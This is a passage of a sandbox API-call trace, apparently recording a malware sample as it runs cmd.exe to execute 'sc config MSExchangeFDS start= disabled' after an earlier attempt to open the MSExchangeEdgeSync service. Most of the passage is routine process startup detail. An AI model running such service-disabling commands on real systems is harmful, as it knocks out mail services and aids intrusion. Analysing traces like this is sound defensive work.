[0129.822] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0129.822] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0129.822] OpenServiceW (hSCManager=0xd18550, lpServiceName="MSExchangeEdgeSync", dwDesiredAccess=0x3) returned 0x0 [0129.822] GetLastError () returned 0x424 [0129.822] _ultow (in: _Dest=0x424, _Radix=11927016 | out: _Dest=0x424) returned="1060" [0129.822] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0129.823] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xb5fdc4, nSize=0x2, Arguments=0xb5fddc | out: lpBuffer="裠Ñ︄µ蔔è") returned 0x62 [0129.824] GetFileType (hFile=0x3c) returned 0x2 [0129.824] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xb5fda8 | out: lpMode=0xb5fda8) returned 1 [0129.824] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd188e0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb5fdb8, lpReserved=0x0 | out: lpBuffer=0xd188e0*, lpNumberOfCharsWritten=0xb5fdb8*=0x62) returned 1 [0129.824] LocalFree (hMem=0xd188e0) returned 0x0 [0129.824] LocalFree (hMem=0x0) returned 0x0 [0129.824] CloseServiceHandle (hSCObject=0xd18550) returned 1 [0129.825] LocalFree (hMem=0x0) returned 0x0 [0129.825] exit (_Code=1060) Thread: id = 445 os_tid = 0xf24 Process: id = "125" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42342000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeFDS start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7060 start_va = 0x330000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 7061 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 7062 start_va = 0x360000 end_va = 0x373fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 7063 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7064 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7065 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 7066 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 7067 start_va = 0x4510000 end_va = 0x4513fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 7068 start_va = 0x4520000 end_va = 0x4520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Region: id = 7069 start_va = 0x4530000 end_va = 0x4531fff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 7070 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7071 start_va = 0x7f4b0000 end_va = 0x7f4d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4b0000" filename = "" Region: id = 7072 start_va = 0x7f4d9000 end_va = 0x7f4d9fff entry_point = 0x0 region_type = private name = "private_0x000000007f4d9000" filename = "" Region: id = 7073 start_va = 0x7f4dc000 end_va = 0x7f4defff entry_point = 0x0 region_type = private name = "private_0x000000007f4dc000" filename = "" Region: id = 7074 start_va = 0x7f4df000 end_va = 0x7f4dffff entry_point = 0x0 region_type = private name = "private_0x000000007f4df000" filename = "" Region: id = 7075 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7076 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7077 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7078 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7079 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7080 start_va = 0x4730000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 7081 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7082 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7083 start_va = 0x45f0000 end_va = 0x46effff entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 7084 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7125 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 7126 start_va = 0x4540000 end_va = 0x457ffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 7127 start_va = 0x4740000 end_va = 0x47fdfff entry_point = 0x4740000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7128 start_va = 0x4800000 end_va = 0x48fffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 7129 start_va = 0x4a60000 end_va = 0x4a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 7130 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7131 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7132 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7133 start_va = 0x7f3b0000 end_va = 0x7f4affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3b0000" filename = "" Region: id = 7134 start_va = 0x7f4d6000 end_va = 0x7f4d8fff entry_point = 0x0 region_type = private name = "private_0x000000007f4d6000" filename = "" Region: id = 7135 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 7136 start_va = 0x350000 end_va = 0x353fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 7137 start_va = 0x4a70000 end_va = 0x4da6fff entry_point = 0x4a70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 446 os_tid = 0xf20 [0129.977] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0129.977] __set_app_type (_Type=0x1) [0129.977] __p__fmode () returned 0x77ac4d6c [0129.977] __p__commode () returned 0x77ac5b1c [0129.977] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0129.977] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0129.978] GetCurrentThreadId () returned 0xf20 [0129.978] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf20) returned 0x84 [0129.978] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.978] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0129.978] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.980] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.980] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x450f760 | out: phkResult=0x450f760*=0x0) returned 0x2 [0129.981] VirtualQuery (in: lpAddress=0x450f767, lpBuffer=0x450f718, dwLength=0x1c | out: lpBuffer=0x450f718*(BaseAddress=0x450f000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.981] VirtualQuery (in: lpAddress=0x4410000, lpBuffer=0x450f718, dwLength=0x1c | out: lpBuffer=0x450f718*(BaseAddress=0x4410000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.981] VirtualQuery (in: lpAddress=0x4411000, lpBuffer=0x450f718, dwLength=0x1c | out: lpBuffer=0x450f718*(BaseAddress=0x4411000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.981] VirtualQuery (in: lpAddress=0x4413000, lpBuffer=0x450f718, dwLength=0x1c | out: lpBuffer=0x450f718*(BaseAddress=0x4413000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.981] VirtualQuery (in: lpAddress=0x4510000, lpBuffer=0x450f718, dwLength=0x1c | out: lpBuffer=0x450f718*(BaseAddress=0x4510000, AllocationBase=0x4510000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0129.981] GetConsoleOutputCP () returned 0x1b5 [0129.982] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.982] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0129.982] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.982] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0129.982] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.982] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.982] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.982] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.982] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.982] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.983] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.983] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0129.983] GetEnvironmentStringsW () returned 0x45f7d98* [0129.983] FreeEnvironmentStringsA (penv="A") returned 1 [0129.983] GetEnvironmentStringsW () returned 0x45f7d98* [0129.983] FreeEnvironmentStringsA (penv="A") returned 1 [0129.983] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450e6c4 | out: phkResult=0x450e6c4*=0x94) returned 0x0 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x0, lpData=0x450e6d0*=0xe8, lpcbData=0x450e6cc*=0x1000) returned 0x2 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x1, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x0, lpData=0x450e6d0*=0x1, lpcbData=0x450e6cc*=0x1000) returned 0x2 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x0, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x40, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x40, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x0, lpData=0x450e6d0*=0x40, lpcbData=0x450e6cc*=0x1000) returned 0x2 [0129.983] RegCloseKey (hKey=0x94) returned 0x0 [0129.983] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450e6c4 | out: phkResult=0x450e6c4*=0x94) returned 0x0 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x0, lpData=0x450e6d0*=0x40, lpcbData=0x450e6cc*=0x1000) returned 0x2 [0129.983] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x1, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.984] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x0, lpData=0x450e6d0*=0x1, lpcbData=0x450e6cc*=0x1000) returned 0x2 [0129.984] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x0, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.984] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x9, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.984] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x4, lpData=0x450e6d0*=0x9, lpcbData=0x450e6cc*=0x4) returned 0x0 [0129.984] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450e6c8, lpData=0x450e6d0, lpcbData=0x450e6cc*=0x1000 | out: lpType=0x450e6c8*=0x0, lpData=0x450e6d0*=0x9, lpcbData=0x450e6cc*=0x1000) returned 0x2 [0129.984] RegCloseKey (hKey=0x94) returned 0x0 [0129.984] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29832 [0129.984] srand (_Seed=0x5ad29832) [0129.984] GetCommandLineW () returned="/c sc config MSExchangeFDS start= disabled" [0129.984] GetCommandLineW () returned="/c sc config MSExchangeFDS start= disabled" [0129.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.984] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x45f9cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0129.984] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.984] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.984] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.984] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.984] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.984] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.984] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.984] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.984] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.984] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.984] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.984] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.984] GetEnvironmentStringsW () returned 0x45f7d98* [0129.985] FreeEnvironmentStringsA (penv="A") returned 1 [0129.985] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.985] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.985] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.985] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.985] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.985] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.985] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.985] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.985] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.985] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.985] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x450f49c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.985] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x450f49c, lpFilePart=0x450f494 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450f494*="Desktop") returned 0x1d [0129.985] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x450f218 | out: lpFindFileData=0x450f218) returned 0x45f05c8 [0129.985] FindClose (in: hFindFile=0x45f05c8 | out: hFindFile=0x45f05c8) returned 1 [0129.985] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x450f218 | out: lpFindFileData=0x450f218) returned 0x45f05c8 [0129.985] FindClose (in: hFindFile=0x45f05c8 | out: hFindFile=0x45f05c8) returned 1 [0129.985] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0129.985] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x450f218 | out: lpFindFileData=0x450f218) returned 0x45f05c8 [0129.985] FindClose (in: hFindFile=0x45f05c8 | out: hFindFile=0x45f05c8) returned 1 [0129.985] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.986] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0129.986] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0129.986] GetEnvironmentStringsW () returned 0x45f7d98* [0129.986] FreeEnvironmentStringsA (penv="=") returned 1 [0129.986] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.986] GetConsoleOutputCP () returned 0x1b5 [0129.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.986] GetUserDefaultLCID () returned 0x409 [0129.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x450f5cc, cchData=128 | out: lpLCData="0") returned 2 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x450f5cc, cchData=128 | out: lpLCData="0") returned 2 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x450f5cc, cchData=128 | out: lpLCData="1") returned 2 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0129.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0129.987] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.988] GetConsoleTitleW (in: lpConsoleTitle=0x45faa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.988] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0129.988] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0129.988] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0129.988] _wcsicmp (_String1="sc", _String2=")") returned 74 [0129.988] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0129.988] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0129.988] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0129.988] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0129.988] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0129.988] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0129.989] GetConsoleTitleW (in: lpConsoleTitle=0x450f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.989] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.990] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.990] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.990] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.990] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.990] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.990] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.990] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.990] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.990] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.990] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.990] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.990] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.990] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.990] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.990] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.990] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.990] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.990] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.990] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.990] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.990] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.990] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.990] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.990] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.990] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.990] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.990] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.990] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.990] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.990] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.990] 